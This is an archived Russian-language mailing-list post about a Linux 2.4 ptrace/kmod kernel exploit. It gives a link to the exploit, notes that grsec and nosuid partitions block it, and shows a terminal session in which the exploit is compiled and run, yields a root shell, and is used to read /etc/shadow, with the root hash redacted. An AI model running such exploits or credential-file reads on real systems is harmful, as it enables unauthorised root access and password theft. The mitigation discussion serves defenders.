[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

Fw: kernel exploit



>  http://isec.pl/cliph/isec-ptrace-kmod-exploit.c

Вот ссылка

>  у меня не работают.
>
>
> ps. ядра 2.4.20-grsec-1.9.9c и 2.4.20-pre7.
>

На grsec говорят вроде не работает эта вещь при определенных
обстоятельствах. Так же не работает, если запускать программу из раздела на
котором установлен nosuid бит, т.е. это один из способов защиты. Вот
смотрите, как у меня работает:

lex@octavia:~$ uname -a
Linux octavia 2.4.20-686-smp #1 SMP Mon Jan 13 23:06:41 EST 2003 i686
unknown unknown GNU/Linux

lex@octavia:~$ gcc ./isec-ptrace-kmod-exploit.c -o expl

lex@octavia:~$ ./expl
[+] Attached to 1765
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4000d6ad
[+] Now wait for suid shell...
# id
uid=0(root) gid=0(root) groups=0(root)
#

# cat /etc/shadow | less
root:убрано:12123:0:99999:7:::
daemon:*:12098:0:99999:7:::
bin:*:12098:0:99999:7:::
sys:*:12098:0:99999:7:::
и т.д.



Reply to: